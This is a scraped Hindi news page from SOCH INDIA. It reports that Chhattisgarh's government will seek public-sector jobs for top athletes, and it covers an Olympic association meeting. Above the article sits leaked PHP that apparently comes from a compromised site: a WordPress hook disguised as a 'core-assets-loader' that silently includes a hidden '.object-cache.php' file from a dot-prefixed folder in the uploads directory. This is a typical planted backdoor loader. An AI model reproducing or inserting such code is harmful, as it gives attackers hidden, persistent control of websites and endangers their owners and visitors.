add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); छत्तीसगढ़ के खिलाड़ियों को पब्लिक सेक्टर में भी मिलेंगी नौकरियां – SOCH INDIA
Menu

राजनीति
छत्तीसगढ़ के खिलाड़ियों को पब्लिक सेक्टर में भी मिलेंगी नौकरियां

nobanner

राज्य के उत्कृष्ट खिलाड़ियों को राज्य शासन के अलावा छत्तीसगढ़ में स्थित पब्लिक सेक्टर यूनिट (पीएसयू) में नौकरी मिलेंगी। इस संबंध में मुख्यमंत्री डॉ रमन सिंह जल्द ही केंद्रीय मंत्री को पत्र लिखेंगे जिससे खिलाड़ियों को अधिक से अधिक प्रोत्साहित किया जा सके। शनिवार को छत्तीसगढ़ आेलिंपिक संघ की कार्यकारिणी की बैठक में यह फैसला हुआ।
बैठक में मुख्यमंत्री ने गोवा में होने वाले 36वें नेशनल गेम्स की तैयारियों का खाका बनाने को कहा है। इसके तहत पदक जीतने वाले खेलों को चिन्हांकित किया जाएगा। अब तक 200 से अधिक उत्कृष्ट खिलाड़ियों को विभिन्न विभागों में नौकरियां दी जा चुकी हैं। वहीं नई राजधानी में 5 एकड़ में एक खेल परिसर बनाया जाएगा। बैठक में महासचिव बलदेव सिंह भाटिया के इस्तीफे पर कोई फैसला नहीं हो सका।

संयुक्त सचिव संजय मिश्रा को प्रभारी महासचिव बनाया गया है। बैठक में खेल मंत्री भैया लाल राजवाड़े, खेल सचिव सोनमणि बोरा, उपाध्यक्ष विक्रम सिंह सिसोदिया सहित अन्य लोग उपस्थित थे।